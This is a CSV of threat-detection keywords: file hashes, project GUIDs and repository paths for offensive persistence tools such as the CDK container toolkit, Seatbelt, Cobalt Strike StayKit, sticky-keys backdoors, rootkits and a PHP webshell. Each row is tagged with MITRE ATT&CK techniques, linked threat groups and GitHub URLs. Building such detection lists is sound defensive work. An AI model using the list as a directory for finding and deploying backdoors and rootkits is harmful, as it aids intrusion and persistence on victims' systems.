"*0c9a9c3ce08d379b81646f92d8cb90fbd3fb384e497a4388f4bc33f1c4c41a44*",".{0,1000}0c9a9c3ce08d379b81646f92d8cb90fbd3fb384e497a4388f4bc33f1c4c41a44.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*0dc31dff0221a2907f19a6feff091161297598b7fab68a0272f7ce0d7698abff*",".{0,1000}0dc31dff0221a2907f19a6feff091161297598b7fab68a0272f7ce0d7698abff.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*0dcb0ef0bd6b1a018108265c2bd1acf0a34ac94f2fe012a3aea22a23b8a151c2*",".{0,1000}0dcb0ef0bd6b1a018108265c2bd1acf0a34ac94f2fe012a3aea22a23b8a151c2.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*0dece401c686c54a06aba232c7bf4f80b49e4087aed13078c4721676341db992*",".{0,1000}0dece401c686c54a06aba232c7bf4f80b49e4087aed13078c4721676341db992.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#filehash","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*0dedf25f9bae707cb1cd5fc106f4516dc0ce7d8bf2114b50afeb6d2fbe506466*",".{0,1000}0dedf25f9bae707cb1cd5fc106f4516dc0ce7d8bf2114b50afeb6d2fbe506466.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*0e17084a14b6af8e50ae4917261546121279fd94299bea1f5fcaa77f18a0feaf*",".{0,1000}0e17084a14b6af8e50ae4917261546121279fd94299bea1f5fcaa77f18a0feaf.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*0e411f4a58f7ca4e77a39c810bd1cb44eca9f8cbae2a20d1c3ed6d3f1b9c4f81*",".{0,1000}0e411f4a58f7ca4e77a39c810bd1cb44eca9f8cbae2a20d1c3ed6d3f1b9c4f81.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*0e8ad3e18880129b9042c97c891691f1437dd648a58480e0d4448a98718edbbf*",".{0,1000}0e8ad3e18880129b9042c97c891691f1437dd648a58480e0d4448a98718edbbf.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*0f45809e1a640a7f54dd5211aff1b5239c310b0e81ddfb1244345ce6ec9d72e2*",".{0,1000}0f45809e1a640a7f54dd5211aff1b5239c310b0e81ddfb1244345ce6ec9d72e2.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*0fa3195520e1b55fa7d36818a916b9b8cee1ee673997ec71c18a52947697d2fb*",".{0,1000}0fa3195520e1b55fa7d36818a916b9b8cee1ee673997ec71c18a52947697d2fb.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#filehash","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*0x727/SchTask_0x727*",".{0,1000}0x727\/SchTask_0x727.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","1","N/A","N/A","10","6","526","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z"
"*0xthirteen/SharpStay*",".{0,1000}0xthirteen\/SharpStay.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","1","N/A","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"*0xthirteen/StayKit*",".{0,1000}0xthirteen\/StayKit.{0,1000}","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","N/A","10","470","74","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z"
"*'1. Set the backdoor'*",".{0,1000}\'1\.\sSet\sthe\sbackdoor\'.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z"
"*107EBC1B-0273-4B3D-B676-DE64B7F52B33*",".{0,1000}107EBC1B\-0273\-4B3D\-B676\-DE64B7F52B33.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","#GUIDproject","N/A","10","1","85","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z"
"*11ae0608b6218b088dc3880ab366c93247bc33665a8a7f14b9da4d450e449dfe*",".{0,1000}11ae0608b6218b088dc3880ab366c93247bc33665a8a7f14b9da4d450e449dfe.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*131c1f2e3e3062392bece1caca144ef426920af8c8a54912f8ec23321a766b5a*",".{0,1000}131c1f2e3e3062392bece1caca144ef426920af8c8a54912f8ec23321a766b5a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*1392c9ae26021890c4fe0a3a960426da99e504d587b971408f40997d56e1ee63*",".{0,1000}1392c9ae26021890c4fe0a3a960426da99e504d587b971408f40997d56e1ee63.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*139c41629e75329a9582b0a3ca07327a134860d4cc3686795a5fb69d09ee50aa*",".{0,1000}139c41629e75329a9582b0a3ca07327a134860d4cc3686795a5fb69d09ee50aa.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*13e50600945f06df6bbbf28c06f76ad655acfbd866cdac2845fc48be282b7e6a*",".{0,1000}13e50600945f06df6bbbf28c06f76ad655acfbd866cdac2845fc48be282b7e6a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*13f42e004a25be9ba99aee3396a1d810026d7750d1e199774c5ba8410b15ae30*",".{0,1000}13f42e004a25be9ba99aee3396a1d810026d7750d1e199774c5ba8410b15ae30.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*14083A04-DD4B-4E7D-A16E-86947D3D6D74*",".{0,1000}14083A04\-DD4B\-4E7D\-A16E\-86947D3D6D74.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","#GUIDproject","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*1416d3d651adeb29acbc825d7d537a379fdcb78102c36842a876dcf29e76c0e8*",".{0,1000}1416d3d651adeb29acbc825d7d537a379fdcb78102c36842a876dcf29e76c0e8.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a*",".{0,1000}14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*1502b9bb17fe2a278c56ecfc1f3eb0cde62b083a260eda1ffe2423797962807d*",".{0,1000}1502b9bb17fe2a278c56ecfc1f3eb0cde62b083a260eda1ffe2423797962807d.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#filehash","N/A","4","2","104","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z"
"*156a20924b696b89e6df463edce6afe72bc8348af0c52c399ff5d88e3a9d6e5a*",".{0,1000}156a20924b696b89e6df463edce6afe72bc8348af0c52c399ff5d88e3a9d6e5a.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","0","#filehash","N/A","7","2","179","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z"
"*1647b6e9073cee9751e3cd9a031656a6b830355a7a87d15cdc18601ddfa2f327*",".{0,1000}1647b6e9073cee9751e3cd9a031656a6b830355a7a87d15cdc18601ddfa2f327.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#filehash","N/A","10","2","157","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z"
"*16edb60cec97590d754e99e2eb719bbc990d71dcf1bda7c8eebf3b517574846d*",".{0,1000}16edb60cec97590d754e99e2eb719bbc990d71dcf1bda7c8eebf3b517574846d.{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","0","#filehash","N/A","10","2","111","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z"
"*1731851bbacba1bb0339f252f84a8f170532eb6f82e024e25071ef889e24d936*",".{0,1000}1731851bbacba1bb0339f252f84a8f170532eb6f82e024e25071ef889e24d936.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*17b096ff5df1b612abc12887e65fae97280533bfe058ce6becb9c0920f4d4c42*",".{0,1000}17b096ff5df1b612abc12887e65fae97280533bfe058ce6becb9c0920f4d4c42.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*18c3accc4f65aae7bf7897adef35abdcca3697884860a6b5360e4f2d07bc26ed*",".{0,1000}18c3accc4f65aae7bf7897adef35abdcca3697884860a6b5360e4f2d07bc26ed.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*197c42343c75fbbb7d77f3aaa92e04e43ddec927887e889197db72fcff5e9df4*",".{0,1000}197c42343c75fbbb7d77f3aaa92e04e43ddec927887e889197db72fcff5e9df4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*1a338c455c8cf9b8499c16e26cfa7e4b34109cf441045a6d006a8d9aa8d852bb*",".{0,1000}1a338c455c8cf9b8499c16e26cfa7e4b34109cf441045a6d006a8d9aa8d852bb.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#filehash","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*1acd7ea1364e9c78d271cc8341ae804e8a6e143d4c31103d6dd5424dbc80498a*",".{0,1000}1acd7ea1364e9c78d271cc8341ae804e8a6e143d4c31103d6dd5424dbc80498a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*1b2c21dd0c747782c5b23b0ca390a23a17cb3fe437021c5f44e5d77d6b71f656*",".{0,1000}1b2c21dd0c747782c5b23b0ca390a23a17cb3fe437021c5f44e5d77d6b71f656.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*1BA54A13-B390-47B3-9628-B58A2BBA193B*",".{0,1000}1BA54A13\-B390\-47B3\-9628\-B58A2BBA193B.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*1bc73a13029b5677f070a991cec0ed90f3ebd70bcc0566a4724496eb71792dee*",".{0,1000}1bc73a13029b5677f070a991cec0ed90f3ebd70bcc0566a4724496eb71792dee.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#filehash","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*1c8de7031ee8dbf83ffde0f1d6401dbc9d95059c984290b115bd58c20b86e8a6*",".{0,1000}1c8de7031ee8dbf83ffde0f1d6401dbc9d95059c984290b115bd58c20b86e8a6.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*1d2e4fa684a99e31479bcc0e5e14aa7f3c56cce3de71028241a9745c67ebf034*",".{0,1000}1d2e4fa684a99e31479bcc0e5e14aa7f3c56cce3de71028241a9745c67ebf034.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*1d533c26001b29f11e09de0c350cab64faef97ea49a41f579d01b9ae74d2a0e9*",".{0,1000}1d533c26001b29f11e09de0c350cab64faef97ea49a41f579d01b9ae74d2a0e9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*1d9b4121c2dbc17a4db31341da2097cd430a61201c57185a42fb687f22f704eb*",".{0,1000}1d9b4121c2dbc17a4db31341da2097cd430a61201c57185a42fb687f22f704eb.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","#filehash","N/A","N/A","9","873","184","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z"
"*1db1f717560d1c53a8ec668a80aad419da22a84b1705f7dfbcc3075634634f64*",".{0,1000}1db1f717560d1c53a8ec668a80aad419da22a84b1705f7dfbcc3075634634f64.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","#filehash","N/A","10","1","85","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z"
"*1e7a48d3a266ff3a1521da0804858af56093f9c736c06be2bc6b46502a776d5d*",".{0,1000}1e7a48d3a266ff3a1521da0804858af56093f9c736c06be2bc6b46502a776d5d.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#filehash","N/A","10","4","360","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*1e82c733ecbf30e06bfa200e327fad167e79a55854a198f92afa2fa7d0f9337f*",".{0,1000}1e82c733ecbf30e06bfa200e327fad167e79a55854a198f92afa2fa7d0f9337f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*1ff183ed7b15612ef77d444187d44d2e1d76df09fa1762c24c54ab45440c77b9*",".{0,1000}1ff183ed7b15612ef77d444187d44d2e1d76df09fa1762c24c54ab45440c77b9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*2033380cf345c3c743aefffe9e261457b23ececdb6ddd6ffe21436e6f71a8696*",".{0,1000}2033380cf345c3c743aefffe9e261457b23ececdb6ddd6ffe21436e6f71a8696.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*2058e248325daeca20f053bfeba403667aa6dd0b70b959963076ae8997c0cbe7*",".{0,1000}2058e248325daeca20f053bfeba403667aa6dd0b70b959963076ae8997c0cbe7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*20f2e5e7e74953d37c5986b751d8d2e0cdd21d2275dfdfc21a5f4f8b4a37776f*",".{0,1000}20f2e5e7e74953d37c5986b751d8d2e0cdd21d2275dfdfc21a5f4f8b4a37776f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*21582bab4103dda43821915b76e96870431e1f2f59bc0135ba4700008abdaa32*",".{0,1000}21582bab4103dda43821915b76e96870431e1f2f59bc0135ba4700008abdaa32.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*22020898-6F0D-4D71-B14D-CB5897C5A6AA*",".{0,1000}22020898\-6F0D\-4D71\-B14D\-CB5897C5A6AA.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#GUIDproject","N/A","4","2","104","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z"
"*223279bb628165de88609c81444f4a9bf9aac6f921ea155ac427a47d13b49084*",".{0,1000}223279bb628165de88609c81444f4a9bf9aac6f921ea155ac427a47d13b49084.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","#filehash","N/A","9","1","36","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z"
"*225ae3f948ca67c0f37ad69a5ce542c27c370993806599aeb927079bf8553acb*",".{0,1000}225ae3f948ca67c0f37ad69a5ce542c27c370993806599aeb927079bf8553acb.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
